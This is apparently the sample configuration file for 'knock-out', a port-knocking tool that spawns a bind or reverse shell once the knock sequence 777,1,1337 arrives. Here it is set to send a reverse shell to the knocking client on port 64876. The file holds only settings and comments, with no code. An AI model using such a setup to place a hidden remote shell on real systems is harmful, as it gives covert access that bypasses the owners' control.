# The values must be in the 'Token=value' form, without spaces.

# Transport protocol, tcp or udp.
Protocol=tcp

# Port knocking sequence of three and only three ports to activate the shell.
Sequence=777,1,1337

# Maximum timeout between each port knock. If this is reached, the knocking
# sequence must be started from the beginning.
# Must be between 1 and MAX_TIMEOUT (defined in knock-out.h, default: 60 secs)
Timeout=15

# Method to spawn a shell after the Sequence is triggered successfully
# Supported methods: bind or reverse.
#
# bind puts a shell listening on the port specified in the next parameter in
# all the available network interfaces.
#
# reverse returns a shell to the client's IP address on the port specified in 
# the next parameter. This port must be listening in the client side.
Method=reverse

# Context-dependant value. Read the previous parameter.
Port=64876
